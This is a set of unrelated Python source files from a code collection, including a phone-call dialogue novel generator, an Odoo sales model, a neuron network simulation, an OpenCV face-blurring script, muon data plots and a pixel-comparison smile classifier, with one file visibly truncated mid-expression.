models.update(\n {\n 'discussions.topic': {\n 'Meta': {'ordering': \"('-created',)\"},\n 'created': ('models.DateTimeField', [\"_('Created')\"], {'default': 'datetime.datetime.now', 'editable': 'False'}),\n 'publishable_ptr': ('models.OneToOneField', [\"orm['core.Publishable']\"], {}),\n },\n }\n )\n\n app_label = 'discussions'\n model = 'topic'\n table = '%s_%s' % (app_label, model)\n\n publishable_uncommon_cols = {\n 'description': 'description',\n }\n\n def alter_self_foreignkeys(self, orm):\n # migrate new topic IDs to topicthread\n alter_foreignkey_to_int('discussions_topicthread', 'topic')\n\n def move_self_foreignkeys(self, orm):\n # migrate new topic IDs to topicthread\n migrate_foreignkey(self.app_label, self.model, 'discussions_topicthread', self.model, self.orm)\n\n","sub_path":"ella/discussions/migrations/0002_03_move_topic_data.py","file_name":"0002_03_move_topic_data.py","file_ext":"py","file_size_in_byte":1249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"186188067","text":"#!/usr/bin/env python\n# encoding: utf-8\n\"\"\"\nPhone It In.\nAn entry for National Novel Generation Month (NaNoGenMo) 2015.\nThe plot: someone needs a computer program but the network's down,\nso a second person has to tediously read it out over the telephone.\nHilarity ensues.\n\"\"\"\nfrom __future__ import print_function, unicode_literals\nimport argparse\nimport inflect # pip install inflect\nimport pronouncing # pip install pronouncing\nfrom random import choice, random\nimport re\n\n# from pprint import pprint\n\n\ndef print_it(text):\n \"\"\" Windows cmd.exe cannot do Unicode so encode first \"\"\"\n# print(text.encode('utf-8'))\n print(text)\n\n\ndef percent_chance(percent):\n return random() < percent / 100.0\n\n\ndef load_file(the_filename):\n try:\n with open(the_filename, 'r') as f:\n lines = [\n line.decode('utf-8') for line in f]\n except IOError:\n lines = []\n return lines\n\n\ndef start_call():\n 
print(\"\"\"- Hello?\n- Oh, hi, is that Bob?\n- Yeah, who's this?\n- It's Dan.\n- Oh, hi Dan. Did you get my email?\n- Yup, I've got the program for you. But the problem is our network's dead.\n- You're kidding?\n- Nope.\n- But I need that listing now...\n- Sure thing, let me read it out to you.\n- Erm, okay then...\n- Got a pen?\n- Hang on... Yep, go for it.\n- Right, here goes...\n\"\"\")\n\n\ndef end_call():\n print(\"\"\"- OK, that's the end.\n- That's it?\n- Yup.\n- All of it?\n- Yes.\n- Phew, what a relief! I'm not going to do that again!\n- Yeah, me neither.\n- Alright, thanks again, see you later Dan.\n- Cheers Bob, bye then!\n- But I might call you back if it doesn't compile. Is that ok Dan? Dan...?? Dan?! Dan! DAN!\n\"\"\")\n\n\ndef leading_spaces(line):\n line = line.rstrip(\"\\n\")\n return len(line) - len(line.lstrip())\n\n\nSTART_TEMPLATES = [\n \"OK so it begins with {0} {1}.\",\n \"The next line begins with {0} {1}.\",\n \"So we've got {0} {1} at the start.\",\n \"Then {0} {1}.\",\n \"{0} {1}.\",\n]\n\nUH_WHAT = [\n \"- Uh, what?\",\n \"- Sorry, missed that bit.\",\n \"- Can you repeat that?\",\n \"- You what?\",\n \"- Come again?\",\n \"- Repeat that.\",\n \"- Say that again.\",\n \"- Sorry, what?\",\n]\n\nGOT_IT = [\n \"- Got it.\",\n \"- Yup.\",\n \"- Mhmm.\",\n \"- Alright.\",\n \"- Aha.\",\n \"- Yes.\",\n \"- Carry on.\",\n \"- Keep going.\",\n]\n\nI_SAID = [\n \"- I said: \",\n \"- That was: \",\n \"- \",\n \"- It went: \",\n \"- It was: \",\n]\n\n\nSTART = [\"open \", \"opening \", \"start \", \"starting \"]\nCLOSE = [\"close \", \"closing \", \"end \", \"ending \"]\nPARENTHESIS = [\"round bracket,\", \"parenthesis,\"]\nBRACE = [\"curly bracket,\", \"brace,\"]\nCHEVRON = [\"angle bracket,\", \"chevron,\"]\n\nSINGLE_QUOTE = [\n \"single quote\",\n \"single quote\",\n \"single quote\",\n \"quote\\n- What kind of quote?\\n- Single,\",\n \"quote\\n- What kind of quote?\\n- Single quote,\",\n \"quote\\n- What kind of quote?\\n- A single 
quote,\",\n \"quote\\n- What kind of quote?\\n- A single quote.\\n- OK, please remember \"\n \"what kind, we've gone through this.\\n- Yeah, sorry.\",\n]\nDOUBLE_QUOTE = [\n \"double quote\",\n \"double quote\",\n \"double quote\",\n \"quote\\n- What kind of quote?\\n- Double,\",\n \"quote\\n- What kind of quote?\\n- Double quote,\",\n \"quote\\n- What kind of quote?\\n- A double quote,\",\n \"quote\\n- What kind of quote?\\n- A double quote.\\n- Right, remember to \"\n \"tell me which one.\\n- Right, yeah, sorry.\",\n]\nFORWARD_SLASH = [\n \"forward slash\",\n \"forward slash\",\n \"forward slash\",\n \"slash\\n- What kind of slash?\\n- Forward\",\n \"slash\\n- What kind of slash?\\n- Forward slash\",\n \"slash\\n- What kind of slash?\\n- A forward slash,\",\n \"slash\\n- What kind of slash?\\n- Newcastle to Bristol,\",\n \"slash\\n- What kind of slash?\\n- A forward slash,\",\n \"slash\\n- What kind of slash?\\n- A forward slash.\\n- Right, remember to \"\n \"tell me which one.\\n- Oh yeah.\",\n]\nBACKWARD_SLASH = [\n \"backward slash\",\n \"backward slash\",\n \"backward slash\",\n \"slash\\n- What kind of slash?\\n- Backward\",\n \"slash\\n- What kind of slash?\\n- Backward slash\",\n \"slash\\n- What kind of slash?\\n- A backward slash,\",\n \"slash\\n- What kind of slash?\\n- Manchester to London,\",\n \"slash\\n- What kind of slash?\\n- A backward slash,\",\n \"slash\\n- What kind of slash?\\n- A backward slash.\\n- OK, remember \"\n \"there's a difference.\\n- Righto.\",\n]\n\n\ndef spacify(text):\n return \" \" + text + \" \"\n\n\ndef remove_duplicate_spaces(text):\n return re.sub(' +', ' ', text)\n\n\ndef upper_case_letters(text):\n l = [char for char in text if char.isupper()]\n if len(l) == 0:\n return None\n elif len(l) == 1:\n return \"\".join(l)\n else:\n return \", \".join(l[:-1]) + \" and \" + l[-1] + \", \"\n\n\ndef upcase_first_letter(text):\n return text[0].upper() + text[1:]\n\n\ndef fullstop_at_end(text):\n text = text.rstrip(\" \")\n if 
text[:-1] == \".\":\n return text\n else:\n return text + \".\"\n\n\ndef you_what(out):\n \"\"\"Chance of not hearing it\"\"\"\n if out:\n if percent_chance(50):\n print(choice(UH_WHAT))\n print_it(choice(I_SAID) + out.lstrip(\"- \"))\n elif percent_chance(60):\n # Ask again about a word\n missed = choice(out.split())\n rhymes = pronouncing.rhymes(missed)\n if rhymes:\n print(choice([\n \"- Did you say {0}?\",\n \"- Was that {0}?\",\n \"- Er, did you just say {0}?\",\n \"- Hang on, was that {0}?\",\n ]).format(choice(rhymes)))\n print(choice([\n \"- No, \",\n \"- Nope, \",\n \"- Nah, \",\n ]) + choice([\n \"I said \",\n \"it was \",\n \"that was \",\n ]) + missed + \".\")\n\n if percent_chance(60):\n you_what(out)\n\n\ndef do_line(line):\n out = None\n spaces = leading_spaces(line)\n if spaces:\n n = leading_spaces(line)\n out = choice(START_TEMPLATES).format(\n p.number_to_words(n), p.plural(\"space\", n))\n line = line[spaces:]\n print(\"- \" + out)\n\n you_what(out)\n if out:\n print(choice(GOT_IT))\n\n words = line.rstrip(\"\\n\").split(\" \")\n new_words = []\n for word in words:\n\n # print(word)\n\n new_word = \"\"\n for char in word:\n if char == \",\":\n new_word += spacify(\"comma\")\n elif char == \"?\":\n new_word += spacify(\"question mark,\")\n elif char == '.':\n new_word += spacify(choice([\"dot\", \"fullstop\", \"period\"]))\n elif char == '-' or char == \"—\":\n new_word += spacify(choice([\"dash\", \"hyphen\", \"minus\"]))\n elif char == \"'\":\n new_word += spacify(choice(SINGLE_QUOTE))\n elif char == '\"' or char == \"“\" or char == \"”\":\n new_word += spacify(choice(DOUBLE_QUOTE))\n elif char == \"#\":\n new_word += spacify(choice([\n \"hash,\",\n \"pound,\",\n \"hash symbol,\",\n \"pound symbol,\",\n \"hashtag,\",\n \"hashtag.\\n- Don't call it a hashtag.\\n- OK. 
\"]))\n elif char == \"=\":\n new_word += spacify(choice([\n \"equals\", \"equal\", \"equal sign\", \"equals sign\"]))\n elif char == \"!\":\n new_word += spacify(\"exclamation mark\")\n elif char == \"/\":\n new_word += spacify(choice(FORWARD_SLASH))\n elif char == \"\\\\\":\n new_word += spacify(choice(BACKWARD_SLASH))\n elif char == '+':\n new_word += spacify(\"plus\")\n elif char == ':':\n new_word += spacify(\"colon\")\n elif char == \"_\":\n new_word += spacify(\"underscore\")\n elif char == \"0\":\n new_word += spacify(choice([\"zero\", \"oh\"]))\n elif char == \"1\":\n new_word += spacify(\"one\")\n elif char == \"2\":\n new_word += spacify(\"two\")\n elif char == \"3\":\n new_word += spacify(\"three\")\n elif char == \"4\":\n new_word += spacify(\"four\")\n elif char == \"5\":\n new_word += spacify(\"five\")\n elif char == \"6\":\n new_word += spacify(\"six\")\n elif char == \"7\":\n new_word += spacify(\"seven\")\n elif char == \"8\":\n new_word += spacify(\"eight\")\n elif char == \"9\":\n new_word += spacify(\"nine\")\n elif char == \"(\":\n new_word += spacify(choice(START) + choice(PARENTHESIS))\n elif char == \")\":\n new_word += spacify(choice(CLOSE) + choice(PARENTHESIS))\n elif char == \"[\":\n new_word += spacify(choice(START) + choice(BRACE))\n elif char == \"]\":\n new_word += spacify(choice(CLOSE) + choice(BRACE))\n elif char == \"<\":\n new_word += spacify(choice(\n [\"less than\", choice(START) + choice(CHEVRON)]))\n elif char == \">\":\n new_word += spacify(choice([\n \"greater than\", choice(CLOSE) + choice(CHEVRON)]))\n else:\n new_word += char\n\n if word.isupper():\n new_word = choice([\n \"{0} all in caps\",\n \"{0} all capitals\",\n \"{0} in caps\",\n \"then capitalised {0}\",\n \"then upper case {0}\",\n \"then {0} all in caps\"]).format(new_word.lower())\n else:\n uppers = upper_case_letters(word)\n if uppers:\n # Mixed case\n new_word += choice([\n \" with capital \", \" with upper case \", \" with big \"]\n ) + uppers\n\n word = 
new_word\n\n new_words.append(word)\n\n out = \" space \".join(new_words) + choice([\n \" and a new line\",\n \" then a new line\",\n \" then new line\",\n \" and then a new line\"])\n\n out = remove_duplicate_spaces(out)\n out = upcase_first_letter(out)\n out = fullstop_at_end(out)\n out = \"- \" + out.lstrip(\" \")\n\n print_it(out)\n\n you_what(out)\n if out:\n print(choice(GOT_IT))\n\n\ndef do_call(lines):\n for line in lines:\n do_line(line)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(\n description=\"Generate a dialogue of a program listing read out over \"\n \"the telephone.\",\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n parser.add_argument(\n '-i', '--infile', default=\"phonecall.py\",\n help=\"Input file\")\n args = parser.parse_args()\n\n # \"Unit tests\"\n assert upper_case_letters(\"abc\") is None\n assert upper_case_letters(\"#\") is None\n assert upper_case_letters(\"# abc\") is None\n assert upper_case_letters(\"Abc\") == \"A\"\n assert upper_case_letters(\"ABc\") == \"A and B, \"\n assert upper_case_letters(\"ABC\") == \"A, B and C, \"\n\n p = inflect.engine()\n\n lines = load_file(args.infile)\n# print(len(lines))\n# print(lines)\n start_call()\n do_call(lines)\n end_call()\n\n# End of file\n","sub_path":"phonecall/phonecall.py","file_name":"phonecall.py","file_ext":"py","file_size_in_byte":11280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"566386026","text":"from odoo import models, fields, api\nclass Venta(models.Model):\n _name = 'upo_wood_app.venta'\n _description = 'Clase venta para UPOWOOD'\n\n name = fields.Integer(\"Numero de venta\", required=True)\n IVA = fields.Integer(\"IVA asociado a la venta\")\n fechaVenta = fields.Date(\"Fecha de la venta\",required=True, autodate = True)\n total = fields.Integer(\"Cantidad total de la venta\",required=True)\n #Añadir las relaciones entre clases\n producto_ids = 
fields.Many2many(\"upo_wood_app.producto\",string=\"Productos asociados a la venta\")\n persona_ids = fields.Many2many(\"upo_wood_app.persona\",string=\"Personas asociados a la venta\")\n #Relaciones one to one\n devolucion_id = fields.Many2one(\"upo_wood_app.devolucion\",string=\"Devolucion asociada a la venta\")\n envio_id = fields.Many2one(\"upo_wood_app.envio\",string=\"Envio asociado a la venta\")\n factura_id = fields.Many2one(\"upo_wood_app.factura\",string=\"Factura asociado a la venta\")\n _sql_constraints = [('venta_name_unique','UNIQUE (name)','El número de la venta debe ser único')]\n\n #Funcion para que el IVA no sea un numero negativo\n @api.constrains('IVA')\n def _check_IVA(self):\n if self.IVA < 0:\n raise models.ValidationError('El IVA debe ser un numero positivo, no puede ser un numero negativo')\n\n","sub_path":"upo_wood_app/models/venta.py","file_name":"venta.py","file_ext":"py","file_size_in_byte":1311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"349960507","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Feb 12 09:36:56 2016\n\n@author: eric\n\"\"\"\nfrom time import time\nstart_time = time()\nimport numpy as np\nfrom scipy import randn\nimport scipy.signal as sg\nimport matplotlib.pyplot as plt\n# my Python functions\nimport lif_neuron as lif\nimport chat_neuron as chatn\nfrom Inoise import intrinsic_noise\nfrom se import se_poisson\n\n# simulation time\nsimulation_time = 500 # [ms]\ndt = 0.05 # [ms]\n\n# set number of neurons of each type\nnum_pyr = 2 # Pyramidal neurons\nnum_inh = 2 # Inhibitory neurons\nnum_chat = 1 # MS-DB ChAT neurons\n\n# set connection probabilities\npyr_pyr_pr = 0\npyr_inh_pr = 0.2\npyr_chat_pr = 0\ninh_inh_pr = 0.2\ninh_pyr_pr = 0.2\ninh_chat_pr = 0\nchat_chat_pr = 0\nchat_pyr_pr = 0.2\nchat_inh_pr = 0.2\n\n# generate connectivity matrix\ncon_matrix = np.zeros((num_pyr+num_inh+num_chat,num_pyr+num_inh+num_chat),dtype=bool)\nfor k in range(num_pyr):\n 
for n in range(num_pyr):\n con_matrix[k,n] = np.random.rand()Vtp)] = Vp\n vi[i,(vi[i+1,:]==Vri) & (vi[i,:]>Vti)] = Vp\n# vc[i,(vc[i+1,:]==Vrc) & (vc[i,:]>Vtc)] = Vp\n\n arp_counterp[i+1,vp[i,:] == Vp] = 1\n arp_counteri[i+1,vi[i,:] == Vp] = 1\n\n # synaptic input based on last step's voltages from each population\n spikesp[i+1,vp[i,:]>0] = 1\n spikesi[i+1,vi[i,:]>0] = 1\n# spikesc[i+1,vc[i,:]>0] = 1\n\n if (t[i]==1000) | (t[i]==2000) | (t[i]==3000) | (t[i]==4000) | (t[i]==5000) | (t[i]==6000) | (t[i]==7000) | (t[i]==8000) | (t[i]==9000):\n print(time())\n\n\n# find network rate for each type of neuron\nprate = np.sum(spikesp,1)/dt*1000 # /dt*1000 to get rate in Hz\nirate = np.sum(spikesi,1)/dt*1000\n#vcrate = np.sum(vc[i,:]>0,0)\n\nplt.plot(t,prate+irate)\nplt.xlabel('time [ms]')\nplt.ylabel('network rate [spikes/s]')\nplt.show()\n\ntotal_time = time()-start_time #in seconds","sub_path":"old files/network_model_script_old_old.py","file_name":"network_model_script_old_old.py","file_ext":"py","file_size_in_byte":10949,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"310877121","text":"# *- coding:utf8 *-\n\n\ndef get_str(args, key):\n \"\"\"\n 获取请求下发参数中如果包含Unicode参数,转置为utf-8\n :param args: 所有参数\n :param key: 需要获取的key值\n :return: 一定是utf-8的value\n \"\"\"\n name = args.get(key)\n if isinstance(name, unicode):\n name = name.encode(\"utf8\")\n return name\n","sub_path":"LoveBreakfast/common/get_str.py","file_name":"get_str.py","file_ext":"py","file_size_in_byte":350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"158224727","text":"import random\n\n# jumped ahead and used a definition instead of if, elif, etc.\n\nresults = {\n\t1 : 'It is certain',\n\t2 : 'It is decidedly so',\n\t3 : 'Yes',\n\t4 : 'Reply hazy try again',\n\t5 : 'Ask again later',\n\t6 : 'Concentrate and ask again',\n\t7 : 'My reply is no',\n\t8 : 'Outlook not so good',\n\t9 : 'Very doubtful'\n} 
\n\ndef get_answer(num):\n\treturn results[num]\t\n\nr = random.randint(1, 9)\nfortune = get_answer(r)\nprint(fortune)\n","sub_path":"automate-boring-stuff/functions/magic8ball.py","file_name":"magic8ball.py","file_ext":"py","file_size_in_byte":423,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"77840716","text":"\"\"\" Experiment with face detection and image filtering using OpenCV \"\"\"\n\nimport cv2\nimport numpy as np\n\n\nblack = (0, 0, 0)\nwhite = (255, 255, 255)\n\ncap = cv2.VideoCapture(0)\n\nwhile True:\n\n # detect face\n face_cascade = cv2.CascadeClassifier('haarcascade_frontalface_alt.xml')\n ret, frame = cap.read()\n faces = face_cascade.detectMultiScale(frame, scaleFactor=1.2, minSize=(20, 20))\n # create a NumPy matrix, which controls the degree of blurring\n kernel = np.ones((40, 40), 'uint8')\n\n for (x, y, w, h) in faces:\n # blurring the face\n frame[y:y+h, x:x+w, :] = cv2.dilate(frame[y:y+h, x:x+w, :], kernel)\n # draw a face\n # mouth\n cv2.line(frame, (int(x+w*.3), int(y+h*.75)), (int(x+w*.7), int(y+h*.75)), black, 10)\n # Nose\n cv2.line(frame, (int(x+w*.5), int(y+h*.55)), (int(x+w*.5), int(y+h*.4)), black, 10)\n # eyes\n cv2.circle(frame, (int(x+w*.7), int(y+h*.35)), 20, white, -1)\n cv2.circle(frame, (int(x+w*.3), int(y+h*.35)), 20, white, -1)\n cv2.circle(frame, (int(x+w*.7), int(y+h*.35)), 10, black, -1)\n cv2.circle(frame, (int(x+w*.3), int(y+h*.35)), 10, black, -1)\n # Display the resulting frame\n cv2.imshow('frame', frame)\n # Display the resulting frame\n cv2.imshow('frame', frame)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n# When everything done, release the capture\ncap.release()\ncv2.destroyAllWindows()\n","sub_path":"face_detect.py","file_name":"face_detect.py","file_ext":"py","file_size_in_byte":1463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"459411453","text":"import numpy as np\nimport 
matplotlib.pyplot as plt\nimport csv\n\n\n# load data, seperated by runsize, seconds: 480,864,1006\ndatas = np.loadtxt(\"muon_data_processing/csv/n-event-plane-data.csv\", delimiter=\",\", skiprows=1, usecols=(1,2,3,4,5,6,7),dtype=int)\nrun_numbers = np.loadtxt(\"muon_data_processing/csv/n-event-plane-data.csv\", delimiter=\",\", skiprows=1, usecols=(0), dtype=str)\n#load number of hits per plane\ndatas_hits = np.loadtxt(\"muon_data_processing/csv/hits_per_plane.csv\", delimiter=\",\", skiprows=1, usecols=(1,2,3,4,5,6,7),dtype=int)\ntotal_hits = np.loadtxt(\"muon_data_processing/csv/hits_per_plane.csv\", delimiter=\",\", skiprows=1, usecols=(8),dtype=int)\n# load holes\ndatas_holes = np.loadtxt(\"muon_data_processing/csv/event_HOLES-data.csv\", delimiter=\",\", skiprows=1, usecols=(1,2,3,4,5,6,7,8,9),dtype=int)\ndatas_holes_dut = np.loadtxt(\"muon_data_processing/csv/event_HOLES_DUT-data.csv\", delimiter=\",\", skiprows=1, usecols=(1,2,3,4,5,6,7,8,9),dtype=int)\n\n# split the path to get the Runnumber, to seperate by run size(<416<606)\nrun=np.zeros(len(run_numbers))\nfor i in range(len(run_numbers)):\n run[i] = run_numbers[i].split(\"_\")[1]\n run[i] = int(run[i])\nplane = np.arange(1, 8)\n\nsum_n_planes= np.zeros(7)\nsum_hits_p_plane = np.zeros(7)\n\n# summ all events \nfor i in range(7):\n sum_n_planes[i] = sum(datas[:,i]) # n-plane-events\n sum_hits_p_plane[i] = sum(datas_hits[:,i]) # total_hits\n\n\n# holes: sum them\nsum_hole = np.zeros(9)\nsum_hole_dut = np.zeros(9)\n# summ all events \nfor i in range(9):\n sum_hole[i] = sum(datas_holes[:,i]) # holes\n sum_hole_dut[i] = sum(datas_holes_dut[:,i]) # holes with dut\nsum_holes = np.array([0,sum_hole[0],sum(sum_hole[1:3]), sum(sum_hole[3:6]), sum(sum_hole[6:8]),sum_hole[8],0])\nsum_holes_dut = np.array([0,sum_hole_dut[0],sum(sum_hole_dut[1:3]), sum(sum_hole_dut[3:6]),\n sum(sum_hole_dut[6:8]),sum_hole_dut[8],0])\n\n\n\n##################---PLOTTING PLOTTING PLOTTING---######################\nfig, (ax1,ax2) = 
plt.subplots(1,2,figsize=(14, 10))\nax1.set_yscale(\"log\")\nax1.grid(which=\"both\", axis=\"both\")\nax1.errorbar(plane[:3], sum_n_planes[:3], xerr=0.5, fmt='k',elinewidth=1.5, lw=0, capsize=3, capthick=1.5)\nfor i in range(3,7):\n ax1.errorbar(plane[i], sum_n_planes[i], xerr=0.5, fmt='r',elinewidth=1.5, lw=0, capsize=3, capthick=1.5, label= str(i+1)+\" planes= %s\"%(int(sum_n_planes[i])))\nax1.set_xlabel(\"Number of traversed planes\")\nax1.set_ylabel(\"Counts\")\nax1.set_title(\"Total number of measured multi-plane-events\")\nax1.legend()\n\nax2.errorbar(plane, sum_hits_p_plane, xerr=0.5, fmt='k', elinewidth=1.5, lw=0, capsize=3, capthick=1.5)\nax2.grid(which=\"both\", axis=\"both\")\nax2.set_xlabel(\"Traversed plane\")\nax2.set_ylabel(\"Counts\")\nax2.set_title(\"Total number of measured hits per plane\")\n\nplt.show()\n\n\n#without subplot\nplt.figure(figsize=(14, 10))\nplt.yscale(\"log\")\nplt.grid(which=\"both\", axis=\"both\")\nplt.errorbar(plane[:3], sum_n_planes[:3], xerr=0.5, fmt='k',elinewidth=1.5, lw=0, capsize=3, capthick=1.5)\nfor i in range(3,7):\n plt.errorbar(plane[i], sum_n_planes[i], xerr=0.5, fmt='r',elinewidth=1.5, lw=0, capsize=3, capthick=1.5, label= str(i+1)+\" planes= %s\"%(int(sum_n_planes[i])))\n\nplt.xlabel(\"Number of traversed planes\", fontsize=18)\nplt.ylabel(\"Counts\", fontsize=18)\n#plt.title(\"Mean rate of expected and measured multi-plane-events\", fontsize=24)\nplt.tick_params(axis='both', labelsize=18)\nplt.legend(fontsize=18)\nplt.savefig(\"/home/david/Desktop/Bachelor_images/6_1/total_events.png\", dpi=300)\n\n\n\n\n###holes\nfig, (ax1,ax2) = plt.subplots(1,2,figsize=(14, 10))\nax1.set_yscale(\"log\")\nax1.grid(which=\"both\", axis=\"both\")\nax1.errorbar(plane, sum_n_planes, xerr=0.5, fmt='k',\n elinewidth=1.5, lw=0, capsize=3, capthick=1.5, label = \"Total number of hits\")\nax1.errorbar(plane, sum_holes, xerr= 0.5, fmt='b',\n elinewidth=1.5, lw=0, capsize=3, capthick=1.5, label= \"Events with one ore more 
holes\")\nax1.errorbar(plane, sum_holes_dut, xerr=0.5, fmt='green',\n elinewidth=1.5, lw=0, capsize=3, capthick=1.5, label= \"Events with holes including the DUT\")\nax1.set_xlabel(\"Number of traversed planes\")\nax1.set_ylabel(\"Counts\")\nax1.set_title(\"Considering events with holes\", fontsize=20)\nax1.legend()\n\nax2.grid(which=\"both\", axis=\"both\")\nax2.errorbar(plane[1:6], sum_holes[1:6]/sum_n_planes[1:6], xerr= 0.5, fmt='b',\n elinewidth=1.5, lw=0, capsize=3, capthick=1.5, label= \"Events with one ore more holes\")\nax2.errorbar(plane[1:6], sum_holes_dut[1:6]/sum_n_planes[1:6], xerr=0.5, fmt='green',\n elinewidth=1.5, lw=0, capsize=3, capthick=1.5, label= \"Events with holes including the DUT\")\nax2.set_xlabel(\"Number of traversed planes\")\nax2.set_ylabel(\"Ratio hole/total events\")\nax2.set_title(\"Ratio of total evetns to events with holes\", fontsize=20)\nax2.legend()\nplt.show()","sub_path":"dschledewitz/muon_data_processing/absolute_event_numbers.py","file_name":"absolute_event_numbers.py","file_ext":"py","file_size_in_byte":4788,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"513498205","text":"import numpy as np\nimport matplotlib.patches as patches\nimport matplotlib.pyplot as plt\n\n\n# This function loads in the datasets, and normalizes them to be 24x24\ndef loadData (which):\n faces = np.load(\"{}ingFaces.npy\".format(which))\n faces = faces.reshape(-1, 24, 24) # Reshape from 576 to 24x24\n labels = np.load(\"{}ingLabels.npy\".format(which))\n return faces, labels\n\n\ndef measureAccuracyOfPredictors(trainingFaces, trainingLabels, param):\n # We need to keep track of the heighest FPC and which pixles(highestBoys) get us that value\n highestFPC = 0\n heightestBoys = []\n #We are going to do four 4 loops to go through every possible combinatino of pixle pairs\n for x in range(24):\n for y in range(24):\n for z in range(24):\n for a in range(24):\n\n # Get the FPC in a vectorized way 
depending on how many pixles we have so far\n FPC = classifySmile(trainingFaces, trainingLabels, param, x, y, z, a)\n if FPC > highestFPC:\n highestFPC = FPC\n heightestBoys = [x, y, z, a]\n print(\"Highest FPC was: \", highestFPC)\n print(\"Highest Values were: \", heightestBoys)\n return ((heightestBoys[0], heightestBoys[1]), (heightestBoys[2], heightestBoys[3])), highestFPC\n\n# Given an array of guesses and an array of labels, return how accurate the guesses are to the labels\ndef fPC(y, yhat):\n return np.sum(y == yhat) / len(yhat)\n\n# In this function we have to return if we think the image is smiling or not based on the comparision between pixels\ndef classifySmile(trainingFaces, trainingLabels, param, x, y, z, a):\n # If we have no pixle paris so far, we will find our first pair by going through all possible pairs and finding the highest fpc they yeild\n if len(param) == 0:\n pixel1 = trainingFaces[:, x][:, y]\n pixel2 = trainingFaces[:, z][:, a]\n comarisonMatrix = pixel1 > pixel2\n fpc = fPC(comarisonMatrix, trainingLabels)\n return fpc\n #If we already have one pixle pair, then we need to keep it in our algorithm(greedy algorithm) and then find the next best pair\n elif len(param) == 1:\n pixel1 = trainingFaces[:, param[0][0][0]][:, param[0][0][1]]\n pixel2 = trainingFaces[:, param[0][1][0]][:, param[0][1][1]]\n pixel3 = trainingFaces[:, x][:, y]\n pixel4 = trainingFaces[:, z][:, a]\n comarisonMatrix = pixel1 > pixel2\n comarisonMatrix2 = pixel3 > pixel4\n\n #This is block of code looks complicated, but it really just says if at least one of the pixel comparisons says true, then we assume it is a smile\n # Due to the fact tha we know ~54% of the faces in the training set are smiling, it means we should assume it is a smile when there is a draw \n largeBoy = np.array([comarisonMatrix, comarisonMatrix2])\n largerBoy = largeBoy.T.sum(axis=1)\n resultMatrix = largerBoy >= 1\n fpc = fPC(resultMatrix, trainingLabels)\n return fpc\n elif len(param) == 2:\n 
pixel1 = trainingFaces[:, param[0][0][0]][:, param[0][0][1]]\n pixel2 = trainingFaces[:, param[0][1][0]][:, param[0][1][1]]\n pixel3 = trainingFaces[:, param[1][0][0]][:, param[1][0][1]]\n pixel4 = trainingFaces[:, param[1][1][0]][:, param[1][1][1]]\n pixel5 = trainingFaces[:, x][:, y]\n pixel6 = trainingFaces[:, z][:, a]\n comarisonMatrix = pixel1 > pixel2\n comarisonMatrix2 = pixel3 > pixel4\n comarisonMatrix3 = pixel5 > pixel6\n\n largeBoy = np.array([comarisonMatrix, comarisonMatrix2, comarisonMatrix3])\n largerBoy = largeBoy.T.sum(axis=1)\n resultMatrix = largerBoy >= 2\n fpc = fPC(resultMatrix, trainingLabels)\n return fpc\n elif len(param) == 3:\n pixel1 = trainingFaces[:, param[0][0][0]][:, param[0][0][1]]\n pixel2 = trainingFaces[:, param[0][1][0]][:, param[0][1][1]]\n pixel3 = trainingFaces[:, param[1][0][0]][:, param[1][0][1]]\n pixel4 = trainingFaces[:, param[1][1][0]][:, param[1][1][1]]\n pixel5 = trainingFaces[:, param[2][0][0]][:, param[2][0][1]]\n pixel6 = trainingFaces[:, param[2][1][0]][:, param[2][1][1]]\n pixel7 = trainingFaces[:, x][:, y]\n pixel8 = trainingFaces[:, z][:, a]\n comarisonMatrix = pixel1 > pixel2\n comarisonMatrix2 = pixel3 > pixel4\n comarisonMatrix3 = pixel5 > pixel6\n comarisonMatrix4 = pixel7 > pixel8\n\n largeBoy = np.array([comarisonMatrix, comarisonMatrix2, comarisonMatrix3, comarisonMatrix4])\n largerBoy = largeBoy.T.sum(axis=1)\n resultMatrix = largerBoy >= 2\n fpc = fPC(resultMatrix, trainingLabels)\n return fpc\n elif len(param) == 4:\n pixel1 = trainingFaces[:, param[0][0][0]][:, param[0][0][1]]\n pixel2 = trainingFaces[:, param[0][1][0]][:, param[0][1][1]]\n pixel3 = trainingFaces[:, param[1][0][0]][:, param[1][0][1]]\n pixel4 = trainingFaces[:, param[1][1][0]][:, param[1][1][1]]\n pixel5 = trainingFaces[:, param[2][0][0]][:, param[2][0][1]]\n pixel6 = trainingFaces[:, param[2][1][0]][:, param[2][1][1]]\n pixel7 = trainingFaces[:, param[3][0][0]][:, param[3][0][1]]\n pixel8 = trainingFaces[:, param[3][1][0]][:, 
param[3][1][1]]\n pixel9 = trainingFaces[:, x][:, y]\n pixel10 = trainingFaces[:, z][:, a]\n comarisonMatrix = pixel1 > pixel2\n comarisonMatrix2 = pixel3 > pixel4\n comarisonMatrix3 = pixel5 > pixel6\n comarisonMatrix4 = pixel7 > pixel8\n comarisonMatrix5 = pixel9 > pixel10\n\n largeBoy = np.array([comarisonMatrix, comarisonMatrix2, comarisonMatrix3, comarisonMatrix4, comarisonMatrix5])\n largerBoy = largeBoy.T.sum(axis=1)\n resultMatrix = largerBoy >= 3\n fpc = fPC(resultMatrix, trainingLabels)\n return fpc\n\n# In this function we know what the pixel comparisions should be, so we can test them with 3/5 being considered a smile\ndef testModel(optimalFeatures, testingFaces, testingLabels):\n # There are five optimal pixel pairs, here we test to see just how optimal they really are\n pixel1 = testingFaces[:, optimalFeatures[0][0][0]][:, optimalFeatures[0][0][1]]\n pixel2 = testingFaces[:, optimalFeatures[0][1][0]][:, optimalFeatures[0][1][1]]\n pixel3 = testingFaces[:, 